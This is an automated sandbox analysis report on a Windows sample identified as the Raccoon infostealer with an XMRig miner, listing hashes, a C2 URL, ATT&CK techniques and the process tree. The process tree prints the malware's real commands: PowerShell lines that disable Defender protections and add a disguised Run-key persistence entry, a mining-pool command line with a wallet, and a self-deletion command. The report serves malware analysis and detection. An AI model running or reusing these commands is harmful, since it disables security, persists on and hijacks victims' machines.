Analysis

  • max time kernel
    63s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    07-08-2021 20:11

General

  • Target

    614ECF4D0A5F0D42655FEDF09B82813D.exe

  • Size

    462KB

  • MD5

    614ecf4d0a5f0d42655fedf09b82813d

  • SHA1

    c5b3e85f19ef84f45001e11af2f3bdc5454b6b16

  • SHA256

    b99ac985c91f5a5e0c2ab8c5b92cb644cea66cb3336c2b6665274e78151cc372

  • SHA512

    57eda7be4c9e80147e58d4c1712596800d8597810dfd1548faf387bac108a4bd5a19fad1a1a52f15ffb326babb544cd5c37e85f824ad91599261ee451b8593cd

Malware Config

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes
  • url4cnc

    https://telete.in/johnyes13

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\614ECF4D0A5F0D42655FEDF09B82813D.exe
    "C:\Users\Admin\AppData\Local\Temp\614ECF4D0A5F0D42655FEDF09B82813D.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3260
    • C:\Users\Admin\AppData\Local\Temp\4xBYAGaQuE.exe
      "C:\Users\Admin\AppData\Local\Temp\4xBYAGaQuE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Add-MpPreference -ExclusionPath C:\
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Set-MpPreference -PUAProtection 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate' -Value '"C:\Users\Admin\AppData\Local\Temp\AutoWindowsUpdate\win32update.exe"' -PropertyType 'String'
        3⤵
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2192
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe --donate-level 0 --max-cpu-usage 25 -o pool.supportxmr.com:3333 -u 42DV3PMzPRnce6MpqpsRsocM4bocvTrZnZbEd5rpxSTSRRkizsGDobC76eZJg3bujm5ou32U11TdxdGcmPq4dzq7CBwVzzP.bitzep -p bitzep
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2916
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 3636 -s 1248
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2992
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\614ECF4D0A5F0D42655FEDF09B82813D.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\SysWOW64\timeout.exe
        timeout /T 10 /NOBREAK
        3⤵
        • Delays execution with timeout.exe
        PID:2136

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    17286868c0a043ae5d2ff5798b6a3163

    SHA1

    b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

    SHA256

    40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

    SHA512

    e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    076b8015e1e964c1d27cef9e8674e564

    SHA1

    601c9a3a950045f4e81bbf5bc677bf288922f216

    SHA256

    79f021ed450e5bf0744ae1f4a6d31d654e2a38226f28132abc4f6ebc838a37a7

    SHA512

    d0944591d8a432c571bf424bb1b91deca92e010e093c2c96db21eb25c3065f8e7692d48c5578d140d126c1f738247dfefc0f1f38c55a67bc90464b8c655c7616

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    baae029a9f7c6b499dff39f7fc6abc18

    SHA1

    dfc7fdba212b6045549c42f1387415b62f2627bd

    SHA256

    26a67599592303e8bb4b0980029278de2ca29cd0ec1c0ca7b900f8eb9069ac9f

    SHA512

    20ee5cce7fe6be8ee00fa3d0356add31b5fd395959293074b08f3a20ae3c1307c8497d579a676ddae52b1aa935908d3febbe56e5929872ad1e6b5565c06e0a69

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    6a99b2f12e6e80f05960179371be7f59

    SHA1

    9f7ea6da1fc582ff74d96525fcc3525e4af1f130

    SHA256

    4886c2a3d6b5577cb73cb532ec8cccf871d08fe68fdbfba7f89d77fa2912f4c9

    SHA512

    e2b33d68f60d16ddfde2e1e486da605bf398983e54ff6cced4de373dadc2f5b0b97ada6078640917d8876603f72519d235dfbb296cc1bb7bd3480ce60717ce67

  • C:\Users\Admin\AppData\Local\Temp\4xBYAGaQuE.exe
    MD5

    90af24b84ea6b4583d9fac76dac6b9ab

    SHA1

    5184ec36d0a9f224e415b0b9cd6f3bd3ec0e4d85

    SHA256

    3c7010aca06054353d4747d9f240744f7a50258de83f37c10e6d5bc81afc6346

    SHA512

    45626ee20ce4fc7dfd418d359035e7b8dab55925f1e4785ea94b5ee65c6cf25ce4d5528046b527f68edaf421d3877a6bb6e0244e06cec2ad30f84e58aafc9236

  • C:\Users\Admin\AppData\Local\Temp\4xBYAGaQuE.exe
    MD5

    90af24b84ea6b4583d9fac76dac6b9ab

    SHA1

    5184ec36d0a9f224e415b0b9cd6f3bd3ec0e4d85

    SHA256

    3c7010aca06054353d4747d9f240744f7a50258de83f37c10e6d5bc81afc6346

    SHA512

    45626ee20ce4fc7dfd418d359035e7b8dab55925f1e4785ea94b5ee65c6cf25ce4d5528046b527f68edaf421d3877a6bb6e0244e06cec2ad30f84e58aafc9236

  • \Users\Admin\AppData\LocalLow\sqlite3.dll
    MD5

    f964811b68f9f1487c2b41e1aef576ce

    SHA1

    b423959793f14b1416bc3b7051bed58a1034025f

    SHA256

    83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

    SHA512

    565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

  • \Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
    MD5

    60acd24430204ad2dc7f148b8cfe9bdc

    SHA1

    989f377b9117d7cb21cbe92a4117f88f9c7693d9

    SHA256

    9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

    SHA512

    626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

  • \Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
    MD5

    eae9273f8cdcf9321c6c37c244773139

    SHA1

    8378e2a2f3635574c106eea8419b5eb00b8489b0

    SHA256

    a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

    SHA512

    06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

  • \Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
    MD5

    02cc7b8ee30056d5912de54f1bdfc219

    SHA1

    a6923da95705fb81e368ae48f93d28522ef552fb

    SHA256

    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

    SHA512

    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

  • \Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
    MD5

    4e8df049f3459fa94ab6ad387f3561ac

    SHA1

    06ed392bc29ad9d5fc05ee254c2625fd65925114

    SHA256

    25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

    SHA512

    3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

  • memory/1184-192-0x0000014676406000-0x0000014676408000-memory.dmp
    Filesize

    8KB

  • memory/1184-153-0x0000014676403000-0x0000014676405000-memory.dmp
    Filesize

    8KB

  • memory/1184-129-0x0000000000000000-mapping.dmp
  • memory/1184-251-0x0000014676408000-0x0000014676409000-memory.dmp
    Filesize

    4KB

  • memory/1184-150-0x0000014676400000-0x0000014676402000-memory.dmp
    Filesize

    8KB

  • memory/1188-127-0x0000000000000000-mapping.dmp
  • memory/1188-250-0x000001D9D8D08000-0x000001D9D8D09000-memory.dmp
    Filesize

    4KB

  • memory/1188-191-0x000001D9D8D06000-0x000001D9D8D08000-memory.dmp
    Filesize

    8KB

  • memory/1188-159-0x000001D9D8D03000-0x000001D9D8D05000-memory.dmp
    Filesize

    8KB

  • memory/1188-158-0x000001D9D8D00000-0x000001D9D8D02000-memory.dmp
    Filesize

    8KB

  • memory/2100-193-0x000001D0D6886000-0x000001D0D6888000-memory.dmp
    Filesize

    8KB

  • memory/2100-128-0x0000000000000000-mapping.dmp
  • memory/2100-152-0x000001D0D6883000-0x000001D0D6885000-memory.dmp
    Filesize

    8KB

  • memory/2100-151-0x000001D0BE180000-0x000001D0BE181000-memory.dmp
    Filesize

    4KB

  • memory/2100-196-0x000001D0D6888000-0x000001D0D6889000-memory.dmp
    Filesize

    4KB

  • memory/2100-148-0x000001D0D6880000-0x000001D0D6882000-memory.dmp
    Filesize

    8KB

  • memory/2100-167-0x000001D0D67D0000-0x000001D0D67D1000-memory.dmp
    Filesize

    4KB

  • memory/2136-144-0x0000000000000000-mapping.dmp
  • memory/2192-197-0x0000028272DC6000-0x0000028272DC8000-memory.dmp
    Filesize

    8KB

  • memory/2192-143-0x0000000000000000-mapping.dmp
  • memory/2192-195-0x0000028272DC8000-0x0000028272DC9000-memory.dmp
    Filesize

    4KB

  • memory/2192-157-0x0000028272DC3000-0x0000028272DC5000-memory.dmp
    Filesize

    8KB

  • memory/2192-155-0x0000028272DC0000-0x0000028272DC2000-memory.dmp
    Filesize

    8KB

  • memory/2916-190-0x000002BEA14B0000-0x000002BEA14D0000-memory.dmp
    Filesize

    128KB

  • memory/2916-194-0x0000000000400000-0x0000000000E14000-memory.dmp
    Filesize

    10.1MB

  • memory/2916-253-0x000002BEA16E0000-0x000002BEA1700000-memory.dmp
    Filesize

    128KB

  • memory/2916-177-0x0000000000400000-0x0000000000E14000-memory.dmp
    Filesize

    10.1MB

  • memory/2916-182-0x0000000000E0CA90-mapping.dmp
  • memory/2916-252-0x000002BEA16C0000-0x000002BEA16E0000-memory.dmp
    Filesize

    128KB

  • memory/3260-114-0x0000000004A40000-0x0000000004AD3000-memory.dmp
    Filesize

    588KB

  • memory/3260-115-0x0000000000400000-0x0000000002CAB000-memory.dmp
    Filesize

    40.7MB

  • memory/3636-146-0x000002E7A38A0000-0x000002E7A38A2000-memory.dmp
    Filesize

    8KB

  • memory/3636-124-0x000002E788B80000-0x000002E788B81000-memory.dmp
    Filesize

    4KB

  • memory/3636-121-0x0000000000000000-mapping.dmp
  • memory/3636-141-0x000002E789530000-0x000002E78953A000-memory.dmp
    Filesize

    40KB

  • memory/4076-125-0x0000000000000000-mapping.dmp